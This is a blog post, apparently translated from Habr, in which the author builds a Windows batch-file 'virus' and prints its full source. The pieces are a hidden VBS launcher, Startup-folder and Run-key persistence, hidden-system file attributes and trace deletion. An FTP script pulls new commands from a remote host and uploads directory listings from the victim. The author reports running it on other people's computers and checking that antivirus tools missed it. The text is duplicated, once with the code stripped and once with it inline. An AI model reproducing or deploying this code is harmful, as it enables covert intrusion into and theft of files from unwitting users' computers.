Batch virus
Everyone at least once wanted to climb in other people's files without their knowledge, but many people are repelled by the idea of downloading various generators, because it is not known what the creators have crammed into, and the antiviruses see them with a bang. Once I also wanted to do something. At first I decided to learn something simple and necessary and started from the command line, things as it later turned out to be irreplaceable.
Having mastered the download by ftp, I decided to create an ordinary virus to download files from someone else’s computer:
Rem Chose hosting 000webhost.com for the ability to edit any text files via the Internet.
The ftp_com.ini file is the file in which the login and password are stored first, and then the ftp commands.
Then I created a file to hide the command line on vbs:
Then (since on a Vista computer) I copied this vbs file to autoload. And for at least some kind of hiding made it hidden system (since where I was going to use them, even hidden files are not displayed), adding to 1 batch file (I called it WinSys.cmd) 2 lines:
')
vbsmach.vbs - the very vbs script.
But then, having tested it on another computer on XP, I realized that it was not working and, for reliability, I shoved it into the registry file. It turned out like this:
And in the body of the batch file, we write the reg import registry file.reg
Then I ran a batch file on my computer and realized that it sometimes freezes and decided to make a delay and decided to do this with another cmd-file - WinHelp.cmd by typing in it
Now we need to add the ability to manage it at least somehow. To do this, you need to add a command to the Ftp_com.ini file to download and send files:
I decided not to modify the WinSys.cmd file, although it can be done without problems. Now on the ftp-server download all the files and the virus is ready. But I added a couple of lines to the WinSys.cmd file for stealth
The last line is necessary for it to work constantly.
And so he is ready, but we will not give so many files to someone, so we should shove all this into either the exe file or 1 bat file, but I chose the first option, since many people are very afraid of all these bat cmd files, making it through winrar, pre-registering the launch of the file vbsmach.vbs after unzipping. After testing this, I realized that this leaves a lot of evidence, so I decided to change a lot in the virus. This is what happened in WinSys.cmd:
When archiving, I entered the path%% userprofile% \ downloads and added the line to the WinHelp.cmd file.
This is what a virus was after it was written:
WinSys.cmd file
The WInhelp.cmd file, but it is needed not only for the delay, it is best to implement the necessary functions to launch the files in it:
Registry file - regedit.reg
Ftp_com.ini file
login from ftp server
password
How to work with him I think is understandable. After creating the archive I decided to check for virustotal www.virustotal.com/file/da428b5c22d4730370ad2018e70eb5fed3dc2b5c7afe9e4fe93a739772aa18e1/analysis/1359883653
And no anti-virus was surprised to suspect anything. This is my first virus, which I decided to run on some computers, naturally on different ftp servers, but after a while I deleted it, since there was nothing interesting about them.
His discovery is certainly not difficult, and the functional is enough only to scare a person (although you can download a lot of nasty things on that computer, but this is a different conversation), but it struck me that no heuristics did not recognize anything suspicious in it. Although it can be used to view other people's files, download and run various exe files, and change the registry and other settings, in fact for a simple malware this is enough, you can also create a hidden administrator account and connect to non-Telnet. Although for these purposes it could be made easier.
After that, I began to refer to firewalls, as one of the best defenses against all kinds of mischief, and an antivirus is needed only to protect against blockers, and only that.
Having mastered the download by ftp, I decided to create an ordinary virus to download files from someone else’s computer:
@echo Off@ftp -s:ftp_com.ini -i ******.host56.comRem Chose hosting 000webhost.com for the ability to edit any text files via the Internet.
The ftp_com.ini file is the file in which the login and password are stored first, and then the ftp commands.
Then I created a file to hide the command line on vbs:
Set oShell = WScript.CreateObject("WScript.Shell")oShell.Run " ", 0, FalseThen (since on a Vista computer) I copied this vbs file to autoload. And for at least some kind of hiding made it hidden system (since where I was going to use them, even hidden files are not displayed), adding to 1 batch file (I called it WinSys.cmd) 2 lines:
')
copy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"vbsmach.vbs - the very vbs script.
But then, having tested it on another computer on XP, I realized that it was not working and, for reliability, I shoved it into the registry file. It turned out like this:
Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"System32"="\"%%userprofile%%\\AppData\\Roaming\\Microsoft\\Windows\\WinSys.cmd""And in the body of the batch file, we write the reg import registry file.reg
Then I ran a batch file on my computer and realized that it sometimes freezes and decided to make a delay and decided to do this with another cmd-file - WinHelp.cmd by typing in it
ping -n 10 127.0.0.1clsWinSys.cmdNow we need to add the ability to manage it at least somehow. To do this, you need to add a command to the Ftp_com.ini file to download and send files:
ftpftpget ftp_com.iniget WinHelp.cmdput tree.txtbyeI decided not to modify the WinSys.cmd file, although it can be done without problems. Now on the ftp-server download all the files and the virus is ready. But I added a couple of lines to the WinSys.cmd file for stealth
copy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Copy Winsys.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"Copy WinHelp.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"Copy ftp_com.ini "%userprofile%\AppData\Roaming\Microsoft\Windows"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Winsys.cmd"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\ftp_com.ini"%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmdThe last line is necessary for it to work constantly.
And so he is ready, but we will not give so many files to someone, so we should shove all this into either the exe file or 1 bat file, but I chose the first option, since many people are very afraid of all these bat cmd files, making it through winrar, pre-registering the launch of the file vbsmach.vbs after unzipping. After testing this, I realized that this leaves a lot of evidence, so I decided to change a lot in the virus. This is what happened in WinSys.cmd:
@ftp -s:ftp_com.ini -i ****.host56.comclsreg import regedit.regcopy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Copy Winsys.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"Copy WinHelp.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"Copy ftp_com.ini "%userprofile%\AppData\Roaming\Microsoft\Windows"del /q ftp_com.inidel /q WinHelp.cmddel /q vbsmach.vbsattrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Winsys.cmd"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\ftp_com.ini"%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmdWhen archiving, I entered the path%% userprofile% \ downloads and added the line to the WinHelp.cmd file.
del /q %userprofile%\WinSys.cmdThis is what a virus was after it was written:
WinSys.cmd file
@ftp -s:ftp_com.ini -i ****.host56.comclsreg import regedit.regcopy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Copy Winsys.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"Copy WinHelp.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"Copy ftp_com.ini "%userprofile%\AppData\Roaming\Microsoft\Windows"del /q ftp_com.inidel /q WinHelp.cmddel /q vbsmach.vbsattrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Winsys.cmd"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd"attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\ftp_com.ini"%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmdThe WInhelp.cmd file, but it is needed not only for the delay, it is best to implement the necessary functions to launch the files in it:
del /q %userprofile%\WinSys.cmddel /q %userprofile%\regedit.regping -n 10 127.0.0.1clsWinSys.cmdRegistry file - regedit.reg
Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"System32"="\"%%userprofile%%\\AppData\\Roaming\\Microsoft\\Windows\\WinHelp.cmd""Ftp_com.ini file
login from ftp server
password
get ftp_com.iniget WinHelp.cmdbyeHow to work with him I think is understandable. After creating the archive I decided to check for virustotal www.virustotal.com/file/da428b5c22d4730370ad2018e70eb5fed3dc2b5c7afe9e4fe93a739772aa18e1/analysis/1359883653
And no anti-virus was surprised to suspect anything. This is my first virus, which I decided to run on some computers, naturally on different ftp servers, but after a while I deleted it, since there was nothing interesting about them.
His discovery is certainly not difficult, and the functional is enough only to scare a person (although you can download a lot of nasty things on that computer, but this is a different conversation), but it struck me that no heuristics did not recognize anything suspicious in it. Although it can be used to view other people's files, download and run various exe files, and change the registry and other settings, in fact for a simple malware this is enough, you can also create a hidden administrator account and connect to non-Telnet. Although for these purposes it could be made easier.
After that, I began to refer to firewalls, as one of the best defenses against all kinds of mischief, and an antivirus is needed only to protect against blockers, and only that.
Source: https://habr.com/ru/post/168099/
All Articles